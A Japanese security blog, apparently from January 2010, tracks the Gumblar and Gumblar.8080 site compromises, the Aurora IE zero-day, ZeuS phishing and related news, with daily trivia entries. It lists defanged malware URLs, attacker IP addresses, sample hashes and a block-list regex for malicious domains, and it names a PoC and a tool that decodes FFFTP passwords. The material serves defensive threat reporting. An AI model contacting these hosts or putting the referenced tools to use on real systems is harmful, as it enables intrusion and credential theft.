UnderForge of Lack

ほめると良いことは無いらしい
せっかく Gumblar.x/8080 最強とか言われたばかりだったのに・・
KasperskyでWebサイト閲覧時にトロイの木馬が誤検知される件
本日2010年1月25日（月） 15:00頃より、Kasperskyをご利用いただいているお客様がニュースサイトなどの記事を参照した際、トロイの木馬「Trojan.JS.Redirector.ar」を検知する場合があることを確認しております。
show_ads.js 1/40 (2.50%)
なんというかまぁ、システムファイル消したりしなくて良かったですねとしか（苦笑）
しかし、４５分おきの定義更新がウリのわりには・・なんとなくオソマツ君ですね

「グゥュエイイアアアアアアア！！！！」
って気になって探してみたけど・・・
クリック注意
※心臓の弱い人は注意↑
うーむ・・
33秒付近
lol why a pig in the KIS 2009 is it a nice sound :) KIS is Great
ほ・・ほんとにこんな音なのか・・
誰がこんな音選んだんだろう・・

----------
saveie6
http://saveie6.com/
助けるなYO！（苦笑）

Get the W3C standard changed to fit IE6
マテ・・

BURYボタン設置希望！
そんなにアナクロ好きならコレでも使ってなさい（笑）

----------
IE should bury down
New un-patched IE flaw found a day after latest hotfix
IEに新たな脆弱性、セキュリティ企業が発見
さて、どうなることやら・・

って夜はあまり真面目な話はしたくないんですが～～

----------
醜い争い
「Gumblar」の変更履歴
こーいうのを見ると、情けは無用って気になるかな？（笑）

----------
明日は平和な日でありますように

ilion様 > おだいじに～（というか異常ありませんように）

EoF

日本最低気温の日
1902年、北海道旭川市で日本の観測史上最低気温-41℃を観測
これにちなんで、寒い日には暖かいものを食べてもらおうと「中華まんの日」「ホットケーキの日」も提唱されている。
カノッサの屈辱 via お詫びの日
神聖ローマ皇帝ハインリヒ4世が、教皇グレゴリウス7世による教会破門の許しを乞うためカノッサ城の門前で立ちつくし始める
左遷の日
延喜元年1月25日（旧暦。新暦では901年2 月16日）、大宰府に左遷されることになった菅原道真が京を出発した
くわばらくわばらの語源はこれだと思ってたのですが、どうも違うらしい・・
くわばらくわばら
「くわばらくわばら」ってなぜ雷のときに唱える？
初天神
1年で最初の天神の縁日。

----------

たまには、「今日は何も無い月曜の朝でした」 って書いてみたいけど、やっぱりダメだったか・・

----------
AOLのアップデートを騙るのはZeuS
AOL 日本ではイーモバイルの傘下に入っていますが、まだ AOL という名称は残っているようですし、サービスの提供も続いています。このAOL専用のインスタントメッセージサービスが、AIM(AOL Instant Messenger)で、使用するプロトコルはOscarという、独自のプロトコルを使用しています。
本題：
AOL Update spreads Zeus / Zbot -- GarWarner
「あなたのAIMアカウントは無効とされ、７２時間以内に再有効化の手続きをとらないと無効化されます」
どこかのテレホンショッピングみたいな・・・

で、誘導されるページの AIM UPDATE がウィルスなのは当然ですが、ページを踏んでしまった瞬間に既に drive by download（「ガンブラー™©Symantec」）によって、以下のマルウェアが駆動させられている可能性があります。
Analysis report for hXXp://109・95・114・251/usr5432/in.php
abs.exe Result: 5/41 (12.20%)
これかな？
Hiloti.gen

products/aimController.php
をばら撒いているのは、いつものような大量の .pl .im ドメインに分岐しており、行き先はZeuS陥落ノードです。

----------
偽ソフトの危険度
「ウイルスを検出したのでお金を払って」――偽ソフト詐欺の傾向と対策 (1/2)
概ね賛成ですが
偽ソフト詐欺を完全に防ぐ方法は、ほかのセキュリティの脅威と同様に存在しない。被害に遭わないように、普段から正規のセキュリティ対策ソフトやOS、アプリケーションを最新の状態に維持する。不審なメールは絶対に開かず、確認する。万が一攻撃に直面しても冷静に対処し、PC環境を回復できる準備をしておくといった、基本的な対策を徹底するしかない。
ここまで書いてあるなら、この部分により具体的な対策を書けばA-評価
あと、根本的に、偽ウィルスソフト＝普通のウィルスよりも性質の悪いバックドアのことが多く、一度感染したら安全のためリカバリ推奨という点を含めればA+評価だったでしょう。

オマエハ何様だ！？って言われそうですが・・（苦笑）

実際のトコ、現在問題になっている "Security Tool"で最も恐ろしいのは、Security Toolsをダウンロードしてきたマルチドロッパが深く潜伏しており、それが生きていれば、「マルウェアを次々とアップデートさせられ、延々と情報を抜かれっぱなし」という現実にどのくらいの人が気が付いているのか？という部分になると思います。
この点を明確に指摘し、注意喚起をしているのは、Unmask Parasiteさんとso-netさんくらいでしょうね・・・

現時点でも、優れた「コンポネンツ・プラグイン系のアップデートを促す記事」ってこれくらいしか見当たらないのですが、他に何かあったら教えてください。
初心者必読！ しないと怖い「プラグイン」アップデートの方法 -- 2009.06
※2009.06時点のバージョンなので、バージョン番号は各個最新へのリプレスが必要。
わかりますか？ この言葉～「プラグインの更新なんて無理！」という方に
ホームページからの感染を防ぐためには
※総務省がんばってます

----------
ガンブラー™の被害って日本だけなの？
というメールを頂きました。
最近のケースをみてると、日本だけなのでは？というくらい被害報告が多いですが、ちゃんと（？）海外でも汚染が広まっています。
From Hidden Iframes to Obfuscated Scripts : Comments
ただ、ここのサンプルにも挙げられているように、どんどん日本の有名ドメイン名を混ぜる比率がたかまっていますので、より日本にターゲットをシフトしている可能性があります。
search: obfuscated
nikkansports.comとかlivedoor.comとか、日本のこと知ってないと埋めれない気もするんですけど、逆引き名から取ったのかな？
今はまだ Security Toolsの日本語版など聞いたことがありませんが、他の偽セキュには既にMO/POによる各国語版があるようなので、そういうのが飛び交うようになると、ますます事態が深刻化するでしょう。

嫌なコラボ：
Gumblar.8080改ざん『/*Exception*/』と出会い系リンク
/*Exception*/ document.write('出会いサイト・・・・
・・・・・・
わ・・笑っちゃダメだ・・・

----------
はいPoC
Firefox 3.6 (XML parser) Memory Corruption PoC/DoS
Verified: yes
3.6.1 soon ・・・かも

----------
必要悪
The necessary evils: Policies, Processes and Procedures
監査をして出てくるのは、社員がポルノサイトを巡回していたという事実だけ・・・っと。

So, since its the beginning of a new year, take some time and update your policies and look at your processes and procedures. Have they changed? Do they need updating? Are they even helpful?
このへんはセキュ会社の人が一番よく陥る罠でしょうが、「基本的に誰もセキュリティにお金（時間含む）なんか払いたくない」んですよ。業務でセキュを語ると厄介者扱いにされるのがオチです。
だから、自分と周辺の人、自分の顧客だけ安全であればいいや～という感覚に陥ります。

それ以上の広範な安全を守るのは、専属の機関が本来はやるべきことなんです（タブンネ）。

----------
その他

最近TwitterがTVなんかで大流行ですが・・
Breaking Koobface’s Captcha Solving Process
Koobface’s captcha breaking infrastructure(figure)
CAPTCHA破りに加担させられる koobface botnet端末の一員っと・・
koobface陥落ノードは日本国内でもジワジワ増加しています。

そして CAPTCHAはどんどん・・・

----------
Aurora Exploits
Hydraqやら呼び名が分散しているのはいつもの通りですが、とりあえず、Microsoftに感謝されているMcAfeeの名称を尊重しておきましょう。
CVE-2010-0249 in the wild – part 0.2 -- extraexploit

AS30058(FDCSERVERS)
FDCSERVRSはちょこちょこ悪意検索にひっかかるのですが、意図的な防弾ホストとは違い、それなりに takedown してるようです。

hXXp://www・qvodcom1・com/360/ie2.htm
hXXp://www・qvodcom1・com/360/what.jpg　-- 200 -- text/javascript
このへんが特徴っぽいですね

qvodcom1・com
撃墜（笑） by Symantec

MD5:0x8FE3779F8D56126393194406EAE60780
またマルチドロッパか・・・
The data identified by the following URLs was then requested from the remote web server:
hXXp://www・qvodcom1・com/以下イロイロ

KILL:
76.73.50.219
qvodcom1・com

----------
その他

182 malicious domains to block
sources: www.malwareurl.com, malwareint.blogspot.com, www.malwareurl.com and others:
fitme .jp
AS4694(SoftbankIDC)
合掌

夢のコラボ：
zly・hacked・jp AS16276(OVH paris)
安心！

----------
暗雲
また？
VUPEN Security Research - Upcoming Advisories
VUPEN-SR-2010-02 - Adobe XxXxXxX Heap Overflow Code Execution Vulnerability
VUPEN-SR-2010-01 - Adobe XxXxXxX Heap Overflow Code Execution Vulnerability

VUPENの情報はとにかくclosedなので、詳細不明なのですが・・

----------
Gumblar.8080
82.192.88.35 AS16265(LEASEWEB) WELCOME BACK !
91.121.4.99 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.4.164 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM)

----------
Google Safe Browsing
| 1264363222 | B | [goog-black-hash 1.49530 update]
| 1264363202 | M | [goog-malware-hash 1.18874 update]
| 294784 | +34(294750) 微増に転じた
| 1273617 |

----------
余談
寝カフェ（あえて修正しない）とか、ホテルの共有PCなんかは、ハードウェア・キーロガーとか仕込まれてそうなので怖いですよね

EoF

給食記念日
学校給食が東京都・神奈川県・千葉県で1947年12月24日に再開されたことを記念。12/24は冬休みのため、1/24に移動
法律扶助の日 via 法律扶助協会
金の日（ゴールドラッシュデー）
1848年、この日アメリカのカリフォルニア州で金の粒が発見されたことから噂が広まり、一攫千金を求めて沢山の人たち（'49ers)が集まった。
ボーイスカウト創立記念日
1908(明治41)年、英国でロバート・ベーデン＝パウエル卿が中心となってボーイスカウトが結成された。当時は本来の意味である斥候の色が強かったが、第一次世界大戦後、ともすれば戦争翼賛的な方向を修正し、国際的で平和的な野外活動に手直しされた。

----------
ALART!
orz.....
もしかして : Alert
しくしく・・・

Targeted Email Examples Relating to Microsoft Internet Explorer 0-day CVE-2010-0249
Example email subjects include:
"Helping You Serve Your Customers"
"Obama Slips in Polls as Crises Dominate First Year as President"
"2010 ***** Commercial SATCOM"
"The Twelve Days of Christmas"
む～
ZeuS系かどうか、微妙なトコですが・・・

ビヘイビアが Gmailアカウントを盗む気満々ですね
update-exe-.txt Result: 11/41 (26.83%)
MD5:0xCD45B58FD1F8FD59F903E74C3BE3BE92

とりあえずは MS10-002適用で影響を受けない・・はずです・・・たぶん。

Trend Micro To Help Proactively Protect Against Zero-Day Attacks like the recent IE Explorer Exploit
TrendMicroはしきりに、自社製品の複合ソリューションで防げる防げる、と言ってますが、MS10-002適応だけではダメなのかよくわかりません。
誤訳怖いので原文：
In the recent attacks, targeted spam emails loaded with malware files were sent to users. In addition, users with vulnerable IE browsers may unwittingly access malicious sites containing hidden JavaScript malware that takes advantage of a zero-day vulnerability. Microsoft initially advised users to enable the use of DEP, but cybercriminals countered by introducing new exploit code that bypassed this protection. Microsoft was forced to release a patch outside of its regular Patch Tuesday cycle.

While the initial attacks were aimed at specific targets, the threat has since evolved and is now fully in the wild, leaving all users on the Internet potentially at risk.
MS10-002でダメならゼロデイだし、大丈夫ならば問題ない（余計なお世話な）んですが・・・

続くらしい
----------
3322
CVE-2010-0249 in the wild – part 0.1 -- extraexploit
mxd0102.3322・org/njk/index.htm via AS4134 やぁ・・

それにしても、この 3322.orgは実に由緒正しい悪意ドメインですね
3322, 8866 and others -- May 21, 2006
Web改ざんの流行 -- 2008/12/23
3322.orgのバリエーション -- 2009/02/02

一つふさいでは～
IE 0day CVE-2010-0249 – Blocking and Tracking
*.3322.org
*.6600.org
*.7766.org
*.8866.org

あ～もう～めんどくさいっ！　人：
REGEXP .*\.\d{4}\.org.* （笑）
※regular expression : 正規表現

----------
釣れますか？
hotmailやGmail, Yahoo Mailのwebmasterを騙って
ACCOUNT ALERT!!!
というメールが届いているようです。
Hotmail password phishing again
Concern about e-mail received from "{removed email address}"

もうそろそろ、ひっかかるのは止しましょうね・・・

----------
週間脆弱性 by HIRT
チェックしておきたいぜい弱性情報＜2010.01.21＞ BGM
・Firefox 3.5.7ならびに3.0.17リリース（2010/01/06）
※Firefox 3.6は一見3.5.7よりも古い印象があります（笑）が、3.6が最新です。
・マイクロソフトIISの拡張子処理にぜい弱性（2009/12/25）
・MySQLに任意のコード実行につながるぜい弱性（2009/12/30）
※詳細は未だに不明
・カスペルスキー インストールフォルダのファイル・アクセス権限の設定に関するぜい弱性（2009/12/29)

微妙に続く
----------
Firefox 3.6になったけど・・
Firefox 3.6リリース
なくなったものもいろいろ

• XBM画像のサポートが廃止された。
• XPCOMプラグインがなくなってNPAPIプラグインに統一された。プラグイン周りでプラグインの種類の違いを抽象化していたインターフェースがいろいろなくなった。Mac OS Xを除き、Java Plug-inはJRE 6u10以降で提供されているNPAPIプラグインしか使えなくなった。ただし古いJREでアプレットを表示すること自体はNPAPIプラグインの新機能により可能。
• MFSA 2009-71の対策としてGeckoActiveXObjectが3.6/3.5.6/3.0.16から廃止された。もともと Windows版にしかなかったものだけど万が一ブラウザ判別に使っていたりしたら修正が必要。
• iframeがようやく(Xの用語でいう)Widgetを使わなくなった(Gadget化された)。これに伴ない、32767ピクセルを超える縦スクロールで表示がおかしくなる問題やWidgetを持つプラグインがCSSのZ順序指定に従わない問題が解消された。
• UIの見かけや使い勝手は3.5とほとんど変わってないけどレンダリングエンジンの中身はけっこう変わってる。
• IETabが対応してないから仕事では使えません!＞＜
• Coral IE Tab を試してください。3.6 で動きます。

Personaって、テーマと呼ぶより、スキンと呼ぶべきものだと思うんだ…
同意・・・

for CentOS: /pub/mozilla.org/firefox/releases/3.6からお好きなのを掘って

NortonのIPSとtoolbarも3.5までです(´･ω･`)
「世界最速セキュリティ」なNortonの使徒なら IE8と心中するべきなのです =)

----------
Tor
Tor(Onion)は、通信経路をsocksプロキシ網を中継することで自分のIPアドレスを隠蔽する技術で、そのサーバは非営利団体によって運用、管理されています。
Tor Project servers hacked

Tor Project infrastructure updates in response to security breach

不用意に（自己組織外で運用されている）Proxyに接続するのはあまり好ましいものではありません。

----------
順調に遅れています
80% of fed sites miss DNS Security deadline
Only 20 percent of agencies were found to have secured their addresses with the measure (aka DNSSEC) according to the publication.
あ～あ・・
先は永そうですね。

----------
その他

http://news.usa.gov/host/test/misc/index.htm
ん？

詳細不明っと・・
またヒラリー氏が咆哮しそうだ・・・

hXXp://www.avtracker.info/
がダウンした模様
セキュ会社にとっては好ましい限りですネ（たぶん）
参考：A black hat loses control -- Oct22, 2009

----------
余談
男の下心を一瞬で見抜く簡単な方法
婚活NEWSにて、「男の下心を一瞬で見抜く簡単な方法」としてPC内の画像・動画ファイルを検索する、というものが紹介されている。
彼のPCの全ドライブを対象に｢.jpg」「.bmp」「.mpg」「.avi」「.wmv」「.rm」で検索だ！！
それ、下心関係ない・・・
のはおいといて、やっぱり .png とか .divx にしろと（かぎりなく敬虔の薄い）神のお告げなのでしょうか

----------
楽しみ（笑）
ガンブラー(/*Exception*/) vs Norton Internet Security 2010
○Norton vs ガンブラー × 決まり手：送り出し
お～　さすが世界最速～

×AviraAntiVir vs ガンブラー ○ 決まり手：はたきこみ
あらあら・・
※AntiVirは、8080系には前から弱い・・・

その時FFFTPに登録してあったサイトのデータは見事に改ざんされました。
これでレジストリの登録データ奪取が完全に実証されてしまいました。

ちょっとコレは恐ろしいですね。
FFFTPはOSSで、それは大変良いことなのですが・・・パスワードデコードのプログラムまで公開されているので、レジストリや.iniファイルに記述されている暗号化パスワードはあまり役に立ちません。
また、アンインストール・プログラムがレジストリまで消してくれるかどうかわかりませんので、昔使ったことがあるだけで、延々と FTP情報がOSのレジストリ情報の中に残されることになるかもしれません。

参考：
FFFTP の ini ファイルに書かれているパスワードを解読する。
FFFTP
FFFTP Version 1.96d [2008/9/23]
現在、ソフトウエアのサポートを一時中断しております。
ソフトウエアの使用は自己責任で、問題は自己解決でお願いします。
できるだけ早いサポート再開を目指したいと思います。

誰かへというわけでは無く・・・：
TCP Monitor Plusだけでも、見てるだけで結構楽しめます（笑）。で、怪しいセッションを見つけたら、他のマシンで起動しているWireSharkで、その宛先パケットをスニフ！
※winpcapのドライバをフックされている可能性があるため
撤回します～
お体に気をつけてくださいませ

----------
Gumblar.8080
80.69.74.73 AS20857(TRANSIP) Netherlands
91.121.4.99 AS16276(OVH Paris)
91.121.86.130 AS16276(OVH Paris)
91.121.142.111 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM) Netherlands

----------
Google Safe Browsing
| 1264276813 | B | [goog-black-hash 1.49458 update]
| 1264276801 | M | [goog-malware-hash 1.18850 update]
| 294750 | -715(295465) 漸減中
| 1271113 |
EoF

夜に書くことは大抵ロクでもないこと・・・
（酔ってる事が多い）

----------
サクラの株が上がった瞬間
Gumblar[ガンブラー]（複数の亜種を含む）ウイルスの感染拡大と対策のお願い
なお、お客様にて運用中のホームページにおいて、スクリプトの埋め込みなど、ウイルスの感染の事実確認が取れました場合、被害拡大防止の観点から該当ホームページの公開を一時停止するなどの対応を実施し、お客様へ弊社よりご連絡差し上げる場合がございますので、予めご了承ください
はい拍手！ *clap* *clap* *clap*

1st takedownを日本のISPで明確に謳ったのは初めてじゃありません？

そうです、ISPの責任だけではなく、客にも「ウィルスを感染させない義務」があるんですよ～
それを遵守できないなら、テイクダウンをISP側でやってもらわないと、この事態には対応できません。

この決断にはいろいろ悩む部分があったとは推測できますが、英断に感謝します。

----------
せこっ
記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクションによるものだという誤解を招く表現があったため、これを修正しました。 [2010/1/22 15:40]

「ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです 」

あえて、どことはいわないけどぉ・・・
どっかのセキュ会社の株が大幅に下がった瞬間を見た（BGM）(87,944)
キャッシュをだいぶ探してみたけど、（探すの下手なので）・・・誰かDiffあったら教えてください。

----------
こっ小室さんですか
T/O

EoF

----------

みなさん、Microsoft Updateは適用されましたでしょうか？
ついでに IE6をまだ使っている方は、そろそろアナログ表示を見飽きたのではないでしょうか？（笑）


----------
電子メールの日 [1（いい）23（ふみ）]
電子メッセージング協議会（現 Eジャパン協議会）が1994年に制定。
全メールの9割が迷惑メールに、流通量は1年で40兆通
八甲田山の日
1902年,陸軍歩兵第五聯隊が八甲田山で遭難
真白き富士の嶺の日
1910年、逗子開成中学校の生徒ら12名が乗ったボートが遭難、全員が死亡。
ワンツースリーの日
これ？ ザ・ベストハウス123

----------
MS10-002で
[MS10-002] Internet Explorer 用の累積的なセキュリティ更新プログラム (978207)
さて・・この適用で本当に事態は終わったのでしょうか？

IEの臨時パッチ公開、できるだけ早く適用を
「mshtml.dll」をレンダリングエンジンとして使っているOutlookなどのアプリケーションを介して仕掛けられる可能性も指摘されている。しかし、これらのアプリケーションに脆弱性があるわけではないとMicrosoftは強調。今回のIEの更新プログラムを適用すれば、すべてのアプリケーションにかかわる脆弱性が解決されると説明している。
Trident系のエンジン使用のプロダクツは、本当に安全宣言してしまっていいものやら・・・
Now you too can mount your own Operation Aurora Attacks!!!
nが多いんですが・・・
Reproducing the "Aurora" IE Exploit
IE6 running on XP SP3 with the following patches missing is invulnerable to your exploit:
まずは一段落というところでしょうかネ
Thanks to H.D.Moore(もう余計なことはヤメテ）

Could Microsoft have fixed "Google hack" prior to attacks?
Kaminsky told Ars. "What, you think an organization like this has just one vulnerability? I don't even think it's very likely that all 33 companies were attacked with this fairly limited, IE6-only exploit—nor do I think it matters. What's interesting here is the who and the why, not at all the how.

あぁ・・不安を増やさないで（苦笑）

----------
さらば～IEよ～
Will switching from Internet Explorer make you safer?
長い・・・
今北産業！って言いたくなってしまう今日この頃・・・

あくまでも私的な話ですが（と断っておかないと怖い）

Ed Bott氏も言っている様に、IE6を使っていることが諸悪の根源であり、できれば根絶させてしまいたい。IE6を使っている理由は、きっと表に出せないような怪しいOSを使っているところがあるんだと邪推しています（XP SP3に上げるためにはGenuineを通さねばならず、だから某国のIE6使用率は60%超）。そういうアングラな環境下の「安全」の確保とか考えるだけナンセンスだと思っています。
※もう一方の某国のIE使用率は90%越という話ですが、これはActiveXを使っているサイトが異常に多く、どーにもならないかららしいです。
ついでに （完全に失敗作の）IE7もなくなってしまうと更に平和になります。少なくともIE7を使っていてIE8に上げたくない理由って何かあるんでしょうか？

というわけで、私としては別に IE8 であればつかっててもいいのでは？という結論は変わっていません。

ただ、毎回セキュリティ懸念の話になるたびに JavaScriptを（壊れた電球のように）切ったり点けたりするよりは、Firefox+NoScriptで「本当に心中してもかまわないサイト」だけ信頼したほうが精神衛生上よろしいのではありませんか？と提案しているに過ぎません。

こんな感じでいかがでしょうか？ > Lさん

参考：
自動更新が始まった“IE 8”はインストールすべきか？

----------
Pushdo
毎度頭が下がる FireEyeの Deep Insightですが、今回はお茶吹きました
Infiltrating Pushdo -- Part 1
SoftLayerに関しては
Keeping in mind the good relationship between FireEye and SoftLayer, we requested access to one of the CnCs. Nick Hale from the SoftLayer abuse department replied very quickly based on the evidence provided by FireEye.
というように、テイクダウンのための取り決めや、トラップ協力体制が確立しているようですので、以後の動きを楽しみにしておきましょう。

そして・・テイクダウン要求をだして、残ったのは・・・
These are the live servers:
WHOIS for 94.75.233.172 is like this:
netname: LEASEWEB
ぶーっ
やっぱアレですね、なかなか汚名を雪ぐのは大変のようです。

ちなみに、Pushdo/CutwailはBredrab/Bredolab系との関連が指摘されています。

----------
TLDで塞ぐなら
最初にお断りしておきますが、TLDで塞ぐという手段を私は１度も是認したことはありません（たぶん・・）
cNotesさんにもそんな意図はないはずです。
Zeus/zbot - aol.com
Zeus/zbot - sendspace.com 2
.cnのドメイン取得方法の変更により、最近のスパムメールの "TLD" は .pl が多くなってきました。
しかも、expireするまでの時間が１週間という、完全な使い捨てドメインですね。

こーゆードメインをDNSに取り込まない取り決めができないものかと思ったり・・・
ねぇ・・Google(8.8.8.8)さん？

----------
だから余計なことは言わ・・・
Mozilla、Firefox 3.6 正式版を発表！！
新型ウイルス「ガンブラー」対策に有効なプラグインチェックツールを提供、
あーっ！(ビットXORフラグON!)
Fx3.6:8080
あ～あ・・・

一瞬で看破されるような余計なことは書かないほうがいいと思いますよ・・・
どっかの首相もね（政治には深入りしない！）

余談：
ナースエンジェルりりかSOS 原作：秋元康ってマジですか！？（笑）

なぜか続くらしい
----------
ガンブラー vs SQL インジェクション
ガンブラー再燃を契機にセキュリティの基本を見直そう
一般的に、Web改ざんの手口はWebアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のガンブラー攻撃によるWeb改ざんにも、SQLインジェクションが使われた可能性があると推測しています

だからSQL（というかデータベース）のどこに FTPのID/PASSを平文で書くバカモノがいるんだYO。
※いや、いるかもしれないけど（笑）

Gumblarにしても Gumblar.8080にしても、過去から連綿と続くDrive by Downloadによるマルウェア汚染、スニファ埋め込みの被害であって、SQLの全く関係ない静的ページで構成されたサイトも陥落しているのはどうやって説明するんでしょうね？

余計なことは言わないに越したことがないので、これで終わり（笑）

埋め込みコード変えドメインも一新、拡散続ける正規サイト改ざん
ガンブラーと呼ばれている一連のサイト改ざん（Gumblar.x、8080）は、ウイルスに感染したサイト管理者のパソコンからサイト更新用のFTPアカウントを盗み出し、それを使って行っている。SQLインジェクションのようにWebサイトの穴を探して入り込んでくるのではなく、正面玄関から堂々と入って来てしまうのだ。
言っちゃらめ～（笑）

もちっと続く
----------
諦観
あなたのGumblar、わたしのGumblar
悟ったよ。しかめっ面でセキュリティの話をするのはセキュ会社に任せるよ派（underforge of lack派）
悟ってませんってば（笑）
まえから言ってることです

ちょっとここでずらずらっとタイムラインを自分的に整理だらだらと羅列してみました。

恥ずかしいので Hide ::

まず、最初に事態が発生したのは 2009年３月ごろ
lite～.cnとかいう変なドメインから "drive by download"なる攻撃手法が発生しました。
当初、原因ははっきりせず、やがて Adobe Flash/Readerの「最新版では塞がれている脆弱性」をつかった自動マルウェア埋め込みの手法であることが判明しました。
これは、当時としては「なにタワゴト言ってるんだ」というレベルの「Webを見ただけで感染」という手法であり、あまりそれを信用してもらえず、セキュリティ各社もあまり報道せず、事態は水面下で流れていきます。

そして、運命の 2009.04.05 PC通販ショップのGENOで感染が確認され、一度は感染コードの除去が行われたにもかかわらず、再感染というセンセーショナルな事態を引き起こします。

GENOが感染した際には gumblar.cnではなく、zlkon.lv(94.247.2.195 as hs.2-195.zlkon.lv)でした。このときには単純な難読化コードに jQuery.js への誘導コードが記述され、さらにそこからドライブ・バイ・ダウンロード攻撃のためのリンクに飛ばされました。

GENOが事あるごとに叩かれるのは、「コンピュータを売ってる店がそんな認識でいいのか？」という部分と「キャッシュを消せば大丈夫」ってあたり（笑）だとおもいますけど、同時期に感染した楽天系の２つの店はもっと対応が酷かったことはあまりしられておらず、私的には 「GENOウィルス」という呼称は好きではアリマセン。

ここで重要なことは従来言われていた「怪しいサイトにいかなければ大丈夫」という神話が崩壊したことです。普通一般のどこにでもあるサイトがある日突然、陥落して毒を吐き出すようになるというのは想像すらしていなかった攻撃ベクトルになりました。

その後、94.247.2.195は応答停止となり、終焉したかにおもわれましたが、わずかのブランクの後、初代Gumblar（Gumblar/Martuz)として凱旋してきました。このとき、初めて事態の深刻さがわかりました。初期の zlkon の攻撃時に「インストール」されていたマルウェアは潜伏中に感染ノードからありとあらゆる情報を盗み、一番有効な撹拌手段として、FTPアカウントを盗んでサイトを改ざんし、さらに感染者を増やすというねずみ講的手法に転じたのです。

しかも、このねずみ講には、大きな違いがありました。

zlkon.lv時代になかった「感染しない環境には普通のコードを返す」という逆発想的rootkit手法を導入したのです。更にはIP制限により、一度マルウェアをダウンロードした相手には一定期間配布しないという「ケチ政策」も施行されました。これにより、感染する可能性の低い環境には何も起きず、脆弱性のある環境への「無差別ターゲット型」攻撃という言語的にもにアリエナイ攻撃手法が確立しました。この手法により脆弱性を放置していた環境にのみ爆発的に広まり、かつ、普通にセキュリティ意識の高いユーザは何が起きているのかわからず、セキュリティ会社は検体を取得できないという、きわめて皮肉な結果が更なるパンデミックを引き起こしたのです。
しかも、この勤勉なマルウェア作者はほとんど毎日のように、javascriptコード、マルウェア本体の更新を行い、セキュ会社とのイタチゴッコなせめぎ合いの主導権を握り続けました。

このとき、悔やまれることは zlkon.lvのテイクダウンの際に、（ITパスポートのCMをうつ金があるなら）きちんとした対応策を IPAあたりが音頭を取って報道等で告知していれば、こんな事態になることはなかったのではないか？と思われることです。

しかし、まだこのときは救いがありました。gumblar.cnもmartuz.cnも、単独のIPであり、極端なことを言えばたった３つのIPを塞いでしまえば、この攻撃は無効化されたのです。
そして、このことをいまだに引きずって「危険なIP/TLDを塞げば大丈夫」という幻想を生む皮肉な結果になりました。

一方、攻撃手法として確立してしまった ドライブ・バイ・ダウンロードは、ますます嫌な進化を続け、8080ポートへのリバースプロキシを悪用した攻撃が水面下で進行していました。
この攻撃は、細かいスパンで切り替わる５基のラウンドロビンを使った大量のドメイン投入で、名称がつけられないまま 8080（仮）として、延々とラウンドロビンを差し替えながら感染ノードを増やしていました。

やがて、この 8080系も姿を消したかに見えた矢先の 2009年11月、ScanSafeとKasperskyが突然アラートを発し、「Gumblar復活」の烽火を上げたのです。

この新しいGumblar(Gumblar.X)は、以前の gumblarよりも更に洗練された攻撃で、その恐ろしく緻密に計算された陥落サイト群のヒエラルキー構成により、幾つものBOTが、複数の役目を絡み合いながら機能する、超並列Botサーバとなっていました。

しかし、この攻撃に使用されていた脆弱性は、既に塞がれていたものばかりで、これまで散々脅されていたユーザはきちんと Adobe系の穴を塞いでいたため、それほど深刻な事態にはなりませんでした。

ところが、その背後で 8080系が古くい癖に極めて有効なJava JREの脆弱性を取り入れ、一気に感染ノードを広げにかかりました。
これは、日本においてメーカ販売のPCに「プリインストール」されており、かつ自動更新の手続きがとられていないものが多いため、一気に日本で拡散する原因となりました。
また、マルウェア誘導コードに有名な日本のドメインがサブドメイン名やフォルダ名に羅列され、ホワイトリストと単純なORチェックを行っているIDSではスルーされてしまうという悲惨な状況も確認されています。
しかも悪いことに 12月初旬に Adobe Readerの脆弱性が公表、PoCが公開されたにもかかわらず 1/13まで放置されたことが致命傷に追い討ちを掛けました。
あー長かった。

というわけで、もしウチ的に "Gumblar"って何？と応えるとするなら

「いやなもの」

ということでどうでしょう（殴）

参考：
Malware Web Threats
GENO(ZLKON)ウイルス 新たな脅威？
Malware Domain List > Malware Related > Malicious Domains > Zlkon.lv
folumの検索結果: 8080
その後の正規サイト改ざん〔後篇〕(3):新たな攻撃手法～「新Nine Ball」「8080」
gumblar.cn

----------
忘れないように
自分へのメモ：

・MySQL の不明な脆弱性はまだ詳報がない（ということはFUDかな！？）
・VUPENの主張するDEP回避はまだ詳細不明（MS10-002で塞がれたのか！？）
・Juumla!のXSSが減らないため、一部のJuumlaサイトに切り替えを勧告中（難しいけど）
・ZeuSがOutlookへの CVE-2010-0249を使っているという情報有（未確認）ていうかヤメテ・・
・怪しげな Excel添付のメールが飛び交っている(開くなよ！）

----------
今日の楽しみ
ガンブラー(/*Exception*/) vs avast!
あーあーあ
しかし、Kasperskyはブロックルールの更新が早いのかな？　自分のTLDだけに、独自の何かを持ってるのかもしれない・・・
※Kasperskyはロシアの会社です。

----------
Gumblar.8080
91.121.74.84 AS16276(OVH Paris) *NEW IP
91.121.79.191 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.11.38 AS16276(OVH Paris) *NEW IP
217.23.5.27 AS49981(WORLDSTREAM) Netherlands
OVHに更に２つのIPが投入、もうこのISPは完全にダメだ・・

----------
Google Safe Browsing
| 1264190410 | B | [goog-black-hash 1.49386 update]
| 1264190402 | M | [goog-malware-hash 1.18826 update]
| 295465 | -1335(296800) 減っていく・・
| 1268902 |
EoF

飛行船の日
1916年1月22日に、初の国産飛行船である陸軍の「雄飛号」が所沢～大阪間で実験飛行を行った
ジャズの日 Ja(January)ZZ(22)
カレーの日
1982年、学校給食開始35周年を期に制定

----------

皆様のコメントに感謝いたします。
本文で返すことが多いのは癖ですので、返事が無いよ～とか気を悪くされた方、申し訳ありません。

----------
Microsoft Emergency Patch


Internet Explorerの更新プログラムを提供開始 (MS10-002)
小野寺です。
なお、MS10-002は、アドバイザリでお伝えしていた脆弱性 (CVE-2010-0249)を含めて、計8件に対応しています。
いつもすばやい更新お疲れ様です。（某レンガの会社はまだない・・）

[MS10-002] Internet Explorer 用の累積的なセキュリティ更新プログラム (978207)
追加されている７つのCVEのうち、detailが出ているのは
CVE-2009-4074 - XSS フィルターのスクリプト処理の脆弱性
だけです。

尚、この攻撃が中国で浸透していた理由として、高い IE6 使用率が挙げられています。
New Clues Draw Stronger Chinese Ties to ‘Aurora’ Attacks
nearly 60 percent of computer users in China browse the Web with IE6
多すぎる・・・
